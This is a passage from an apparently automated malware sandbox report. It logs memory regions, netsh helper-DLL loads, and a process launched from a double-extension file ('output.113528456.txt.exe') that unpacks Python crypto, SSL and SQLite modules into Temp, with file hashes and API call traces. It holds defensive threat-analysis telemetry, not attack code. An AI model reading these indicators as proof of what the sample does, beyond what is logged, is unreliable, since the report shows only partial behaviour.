wkscli.dll 0x73c40000 0x73c4efff Memory Mapped File rwx False False False -
netutils.dll 0x73c50000 0x73c58fff Memory Mapped File rwx False False False -
netapi32.dll 0x73c60000 0x73c70fff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
firewallapi.dll 0x748e0000 0x74955fff Memory Mapped File rwx False False False -
userenv.dll 0x74a30000 0x74a46fff Memory Mapped File rwx False False False -
devrtl.dll 0x74bd0000 0x74bddfff Memory Mapped File rwx False False False -
logoncli.dll 0x74ca0000 0x74cc1fff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
wevtapi.dll 0x75010000 0x75051fff Memory Mapped File rwx False False False -
srvcli.dll 0x75220000 0x75238fff Memory Mapped File rwx False False False -
secur32.dll 0x75290000 0x75297fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
devobj.dll 0x75400000 0x75411fff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
wldap32.dll 0x75730000 0x75774fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
setupapi.dll 0x764b0000 0x7664cfff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 38 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0xa74
77 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:08:47 (UTC) True 1
Fn
System Get Time type = Ticks, time = 107453 True 1
Fn
Module Get Handle module_name = c:\windows\system32\netsh.exe, base_address = 0x1620000 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = RASMONTR.DLL, base_address = 0x6f8d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\rasmontr.dll, function = InitHelperDll, address_out = 0x6f8e6cb9 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NSHWFP.DLL, base_address = 0x6dd60000 True 1
Fn
Module Get Address module_name = c:\windows\system32\nshwfp.dll, function = InitHelperDll, address_out = 0x6ddbbbb2 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = DHCPCMONITOR.DLL, base_address = 0x71f30000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dhcpcmonitor.dll, function = InitHelperDll, address_out = 0x71f31cd4 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = WSHELPER.DLL, base_address = 0x71f50000 True 1
Fn
Module Get Address module_name = c:\windows\system32\wshelper.dll, function = InitHelperDll, address_out = 0x71f5157b True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NSHHTTP.DLL, base_address = 0x6ee90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\nshhttp.dll, function = InitHelperDll, address_out = 0x6ee91b47 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = FWCFG.DLL, base_address = 0x6dd40000 True 1
Fn
Module Get Address module_name = c:\windows\system32\fwcfg.dll, function = InitHelperDll, address_out = 0x6dd42a30 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = AUTHFWCFG.DLL, base_address = 0x6dbb0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\authfwcfg.dll, function = InitHelperDll, address_out = 0x6dbb4420 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = IFMON.DLL, base_address = 0x6ee80000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ifmon.dll, function = InitHelperDll, address_out = 0x6ee817a3 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NETIOHLP.DLL, base_address = 0x6db80000 True 1
Fn
Module Get Address module_name = c:\windows\system32\netiohlp.dll, function = InitHelperDll, address_out = 0x6db96e4b True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = WHHELPER.DLL, base_address = 0x6dd30000 True 1
Fn
Module Get Address module_name = c:\windows\system32\whhelper.dll, function = InitHelperDll, address_out = 0x6dd31c99 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = HNETMON.DLL, base_address = 0x6db70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\hnetmon.dll, function = InitHelperDll, address_out = 0x6db7200c True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = RPCNSH.DLL, base_address = 0x6db60000 True 1
Fn
Module Get Address module_name = c:\windows\system32\rpcnsh.dll, function = InitHelperDll, address_out = 0x6db62f94 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = DOT3CFG.DLL, base_address = 0x6db40000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dot3cfg.dll, function = InitHelperDll, address_out = 0x6db4a31d True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NAPMONTR.DLL, base_address = 0x6b770000 True 1
Fn
Module Get Address module_name = c:\windows\system32\napmontr.dll, function = InitHelperDll, address_out = 0x6b77c7d5 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NSHIPSEC.DLL, base_address = 0x6b6b0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\nshipsec.dll, function = InitHelperDll, address_out = 0x6b6b6910 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = NETTRACE.DLL, base_address = 0x6b550000 True 1
Fn
Module Get Address module_name = c:\windows\system32\nettrace.dll, function = InitHelperDll, address_out = 0x6b59268b True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = WCNNETSH.DLL, base_address = 0x6da80000 True 1
Fn
Module Get Address module_name = c:\windows\system32\wcnnetsh.dll, function = InitHelperDll, address_out = 0x6da8228c True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = P2PNETSH.DLL, base_address = 0x6b440000 True 1
Fn
Module Get Address module_name = c:\windows\system32\p2pnetsh.dll, function = InitHelperDll, address_out = 0x6b4438e5 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = WLANCFG.DLL, base_address = 0x6b360000 True 1
Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6b36c7d8 True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = WWANCFG.DLL, base_address = 0x6da70000 True 1
Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6da720ed True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1
Fn
Module Load module_name = PEERDISTSH.DLL, base_address = 0x6b290000 True 1
Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6b30c796 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769624c2 True 1
Fn
System Get Info type = Operating System True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1
Fn
Data
Process #5: vkvmtnchwv3w.exe
301 0
»
Information Value
ID #5
File Name c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:18, Reason: Child Process
Unmonitor End Time: 00:01:23, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0xba4
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BA8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
private_0x0000000000040000 0x00040000 0x00040fff Private Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory rw True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory rw True False False -
locale.nls 0x002d0000 0x00336fff Memory Mapped File r False False False -
private_0x0000000000340000 0x00340000 0x00437fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003e4fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003cbfff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003dffff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x00465fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003c7fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003e8fff Private Memory rw True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory rw True False False -
private_0x0000000000510000 0x00510000 0x00667fff Private Memory rw True False False -
private_0x0000000000510000 0x00510000 0x00792fff Private Memory rw True False False -
pagefile_0x0000000000510000 0x00510000 0x00902fff Pagefile Backed Memory r True False False -
vkvmtnchwv3w.exe 0x01250000 0x0129dfff Memory Mapped File rwx True True False
api-ms-win-core-synch-l1-2-0.dll 0x71f10000 0x71f12fff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd 53.50 KB MD5: ef46c349a76a9c466014a6a67cbaac99
SHA1: 2f9ef385498261d129d2ced0096b56df30ac6afc
SHA256: 815430609a61ae49de9150e82e688c4175e296b2274aefa0373fe39bb4948042
SSDeep: 384:/xwYe6V2dqG5islrOmlpiFK4r4A5Zaqb/K2KUpH3d:5ve6V2MG5iKOmlyKwNR
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd 9.50 KB MD5: 0a3ec8fff372a800326eb8365de81f38
SHA1: 9707b3babda5d081f6c7188a00039721746c548c
SHA256: 17fbe1dd26ac0b49b7764d5f667fd12b9929b7fa9fa60395847cf80f653a0fdb
SSDeep: 192:bSI4ySF5IHS37idhL0zd3XXF2dqgeFI4BUKXKXecWnHcyZfgC:b4F5cQ7O+zhHF2KZZ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll 2.51 MB MD5: 22ea7603bf1f1aaa2ae6d89ddc9cb663
SHA1: 30552231ad37b14a0bb3f8b95b4d700da8d4ef6c
SHA256: ac02f0ab3707eaf2d6980eeaf73cfd064e77121ce8a78d057be84c3b436746c5
SSDeep: 49152:Z3sX1oyMz3EzLZbDzRMLVCczh005HGVbgICqPdn4MMSH5agI+FTjq5+el30FXG:Z61oxVCczhpdN3g4MfHUl+aZSFX
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll 637.83 KB MD5: b3892e6da8e2c8ce4b0a9d3eb9a185e5
SHA1: e81c5908187d359eedb6304184e761efb38d6634
SHA256: ae163388201ef2f119e11265586e7da32c6e5b348e0cc32e3f72e21ebfd0843b
SSDeep: 12288:Zhr4UCe8uLQrIYE8EdPz1n0/WGipK5d7AO7QlxxdmRyy1:981FYPz8WGip0d7AhpdmRyy1
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd 28.50 KB MD5: dd3db5480eb52e8f69d47f3b725e6bfb
SHA1: cb14cda7f5e3e2b88c823e4d15643680398b361e
SHA256: 51054f4d28782b6698b1b6510317650e797e11f87fa29fceaf8559b6bcbf4dfe
SSDeep: 384:9KckxaWHQuFS1bIYcBjZjKPzA37usOo8Vd6IHiPKDkAKB5F0riz4BPK27raf0:9DkxaywpjcJhaAahoICS4AI3GDm
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h 20.82 KB MD5: bc185de8b2437963368a85fdd9852951
SHA1: 1459f1428214fcca7f203fb3a3aff28e16eb9c1b
SHA256: 8b130d901e0f83b55699d565f103f2f8f1b3a51712ebb4b9646ea517cc1f04d6
SSDeep: 384:pGpFpaU1kgCw8r+MIP8Bj5DvVySh3awQBoerw8W+PYV0FGYfN/+:pGpFpb+IU99UShATrw8W+AKF/+
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd 24.50 KB MD5: 6de0ace298bfe90b36a173e7547f7c6a
SHA1: 871bbf9cd0c056b2aef11a0af83d07ee33ca46ca
SHA256: e5b51438204d762734625f3e03c571b3b90c2ecdc358af167bdbc6bea8a0d3e3
SSDeep: 768:9RZ5g+l3KQZrpJI+LXOJqIsmANOtrD5OEhrV262R:9RZ5g+l3KQZrpfLXOJqIsmANOtvhrV2Z
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd 50.50 KB MD5: 2ac64a3ea631e7e43d01cbb149919da4
SHA1: 53ea53a48ee79c836c4b1ef8f3d58f69913cfdfe
SHA256: 1e7d4623b0d1953a02c604b782cf3f7d0bd84884e032c863f0d5f488af425dec
SSDeep: 1536:0/CFaMdXLQXytg5wInItlHCMRZYL2oITtepJW9X0b:RPDtlHCtPITt4E9Eb
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest 0.98 KB MD5: 7af6b943120fadcb5fd3115be3424dde
SHA1: 0b28564af655c64afcd0ba76369737b7c58daeae
SHA256: 003d7dacfc30ae2eee403ec2e18710c79de92d7bb338df3be8cfe7f8ed15945c
SSDeep: 12:TMHdtnQEH5ZCgV4SNXvNxW5v+MHCgVuNnhSN4XGpOvcNg4gv18zyiUGXwcGkVtvM:2dtn3ZEglN2v+zg4NnEN4X1me5rcb3S
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd 91.00 KB MD5: 0927967ca911391c4e4ef10b950499a5
SHA1: 38c23cb6d6461ae1ed04b26835058d9367be63c2
SHA256: d44f765d24d572188c3d5ee803cf824b2db1e9bd4e6d1d95062cd6a764202cdd
SSDeep: 1536:SEXH04hVhg2JGa1ISZaf66lvIcEd+H4qk9R/Ec3LcGzVmH7WU3f:DU4Bg2JdqSZlPcAaE/P3LFzVmH7WU3f
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd 672.50 KB MD5: e38072d0db1371b05fc861ccd1bb0a37
SHA1: 594fc3f069a791f96e910a3dac122a7a32331eea
SHA256: c83effcd8372389c2d3cff38fab5e41d0f7c96d9bb47a6e58de6ed63998ea3cb
SSDeep: 12288:+f3T3AxoMPBt8FpQsVdFiI5mZMPXubUxktwdQ:o3LxM8XQsVdXSPAxLdQ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd 135.00 KB MD5: 5ee764051c2639c06764e3f7f97d249b
SHA1: a10a0b019da62cbb2b587df38770960f3b5905ce
SHA256: 18675152111924780b6c746a78f11936d8ba31f18418b8e255e579d932f2acf6
SSDeep: 1536:oJS1sIuMkXYi1xxB/c9gtOmPNg8i5RpExhvMnFRJsVsErYcisoJGCePyZSxBrzWb:AymkoToJnvK+sVU82J/vKvJUoW4
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd 47.00 KB MD5: aee0f99363c2445f47b6d64c30911d7e
SHA1: 2788e085d2a41497847e6867d3c0b553db4b4c29
SHA256: 59ef12178676e336d819f4e4b4d9c689fc51c95cd06ab9c5c1d06774f2657451
SSDeep: 768:8RsCOeSoO+rVa+KiejEG9SaFPBGsNoC+M6L1+UQX:iRO+rVXKicSaFP0C7gLBQ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest 1.03 KB MD5: fedfdf2256720badeff9205e784b5dc8
SHA1: 014f80bbb14d6f9ed5fcf0757bf2bef1a22b3b88
SHA256: 6373fb8261af01506dc57dee535a0be800f3a59b18b0cc1e276807c746329ff6
SSDeep: 24:2dtn3mGv+zg4NnEN4XojC6vuVWV5rcb3S:ch35+zg4i0oKWmS
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd 71.00 KB MD5: 6986a7cb6a80ef68644b1e9e5ec70545
SHA1: 15c426213be4d10c0b38443640ba8ac8068be7c8
SHA256: 27b035e9a0b63b1f4891dbae222dabd7a5756bfe1a504d9e9357d2b59b2fe5d9
SSDeep: 1536:ITfB9P4y4yhXYjrKV4S1uB8xgKvaGn6E8S+f0PP8fQKTiL:IrRYn04Su8xgKvaGn6XZfmAJTi
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll 540.00 KB MD5: c16381aa1c036104d6e4097463b69798
SHA1: df29e08edb9729e2829ec39b9003ee80202b35ed
SHA256: ffefe1cc04f2f0e47e43c8c823447637fab227482ea8b69c8d2b4e6198f00da4
SSDeep: 12288:4qSD9MQCNucGNXzIRbhapUqwdMMI9Z6z+lz3KRd4erm5jF:paWQCNu5zSaOq1jZ6y8deZF
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd 11.50 KB MD5: d59d197f69aa42f0a5d4e8e0a75fb2b4
SHA1: e1cf2873e5285f3df574f1441865199f8d6c647d
SHA256: efca6435f01bc7399ef7907b6aeba9394b2966d46325f2a81f34eaa3c733dc4e
SSDeep: 192:qY35RZ+QmbQNw7MPDNqcSUpdkDXUnv3XDVR6ykXc1U5Us:qY35nLiAPDNSsdGXoPzV5uuds
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll 556.33 KB MD5: db001faea818ae2e14a74e0adc530fc0
SHA1: 7db49c1a611b38a4f494b1db23087c751faa3de1
SHA256: 45cb405589c92bf74c47b7c90e299a5732a99403c51f301a5b60579caf3116e7
SSDeep: 12288:fCFE340h3e34GVZQACkIrYhUgiW6QR7t5183Ooc8SHkC2eHgAfl:fCh0h3e3vgzrA83Ooc8SHkC2eHgAfl
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll 220.00 KB MD5: 7200dca324f3d1ecd11b2b1250b2d6c7
SHA1: df3219cfbc6f6ee6ef025b320563a195be46d803
SHA256: 636e12fea8c47ea528dba48827ac51a2e98b2ef0864854c9375b8170555c0a6e
SSDeep: 3072:Yk3eocziNzMLSMOYscmnWCAXm00LRk86Goao1IJU87/amFYw8fF01OyA9LX:v6OMqcEJAXb0LRn6fa3/amiX2Oy0
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll 107.50 KB MD5: a28653caf591fc7b4c7971821deb9a56
SHA1: 5ff590e23cbb45ae4a441eeecf2d0609103eec08
SHA256: 88d8eb5894c47990b4ff88e94a75f59c498cfd16b0f29894f0947f5ed2a862f3
SSDeep: 3072:VZsz18WtYUmuPcgxxKEYLRMMMHBBY2Y7bi0tf70fsNOK8dZ5TaY:VCzptYUmuEgxxKEYLRMbjY7bi0170EN4
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd 1.34 MB MD5: b1ce5ba4b67e186b393fb85fd18c59af
SHA1: c27eb759181e4dfd80eb5f0f5848787cb7ce4bfd
SHA256: 2a3911be8b1a2689de409188c1c72c3abe5ff0f51128f5d7a22b30e3a957ab97
SSDeep: 24576:3Toeiij2g9AqfUrSd7kq7iMfSDqq8I09tTTeCEi04ozFhmmvI+KpPQpzaGNXpJ+S:3sijeTrSd2ZV09tJP03YkaGJpJc2Lob0
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd 23.50 KB MD5: 6d0b7d549cc16f4018fd67bec9bb771e
SHA1: 3b3d425886ea8678d4d7557fcc50c36951be27bf
SHA256: 654308420dd8362408b60e6d602c39101f1db75960112bc23f6298a810a1bf83
SSDeep: 384:TqFOIiDSVujmVnO7aNfnVs8jMDcqR56DUgnnVlyDIjM6D9cJ:OA/DSYiVnO7SBqRoBVRXD9c
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd 10.00 KB MD5: fd7ba0d28b7809d0dc15aef9d7eaf62b
SHA1: c56d51ea4e61431918c3f0220e6f4c56d3eb9b52
SHA256: 36314665fa2a6effbe7a4280b2d420a438d02c40bd7b6a690a588490a2e8e4d0
SSDeep: 192:TidzghojQKuGhNUyA5jQjT8KW6WZXN7cLmoVktRcX3X62dqSea:udzgwLkjjoT8KQXgVktQK2H
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd 10.00 KB MD5: 7fec8c7c9fde5ac8f2eec8e5abdd1c56
SHA1: 82dd6659d95140b2a28e303044643cc4683155da
SHA256: 69c2d16001339775dba69bc884ed95602bc126b65bb9dcf96a779790dd41f52c
SSDeep: 192:LPDn3nSJIcNaVT6Gbp8wyhzh3X62dqH3:Lbn3nkNAT6Gl8lzdK2c
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd 991.00 KB MD5: 2c3221968e7f644a1fae03106791d85b
SHA1: 8a51cf7dd9a1d51ceba1c1465d1aa3424c6fb744
SHA256: 878388c1ae7319f7d1a89d2c186c460f41f259055b63cda29f5008f4025f4c5e
SSDeep: 24576:+5UA5DF4x6jKzYpenuNnVgA4bO0+PwNAQpIUFLZsCZFpU8XrCSSa:cFc6WYpmuNVeODPOpIGFpU5SSa
False
Threads
Thread 0xba8
301 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:13 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76961e16 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7699f72b True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
